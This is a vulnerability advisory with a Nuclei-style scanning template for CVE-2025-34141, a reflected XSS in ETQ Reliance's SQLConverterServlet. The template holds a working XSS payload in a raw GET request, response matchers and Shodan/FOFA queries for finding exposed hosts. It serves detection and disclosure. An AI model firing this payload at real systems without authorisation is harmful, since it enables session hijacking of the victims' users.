A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
PoC代码[已公开]
id: CVE-2025-34141
info:
name: ETQ Reliance - Reflected XSS via SQLConverterServlet
author: slcyber,pdresearch
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
impact: |
Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
remediation: |
Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-34141
- https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
classification:
epss-score: 0.01778
epss-percentile: 0.8204
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-34141
cwe-id: CWE-79
cpe: cpe:2.3:a:etq:reliance:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: etq
product: reliance
shodan-query: 'html:"ETQ Reliance"'
fofa-query: 'body="ETQ Reliance"'
tags: cve,cve2025,etq,reliance,xss,reflected-xss,vkev
flow: |
http(1)
if(template.path){
http(2)
} else {
set("path","reliance")
http(2)
}
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: header
internal: true
name: path
group: 1
regex:
- 'Location: https?://.*?/(.*?)/'
- raw:
- |
GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '</textarea><img src=x onerror=alert(document.domain)>'
- 'You have to start the ENGINE application before using this form.'
condition: and
# digest: 490a0046304402205f1a17fa7c18baa2876a30f0fd6866b1409d21014eaa91d2eb3e60b928a5241202203461f8483a5a8c09f0dd42298a97563d2ad0f7ccf947af2baaf95459207d2e06:922c64590222798bb761d5b6d8e72950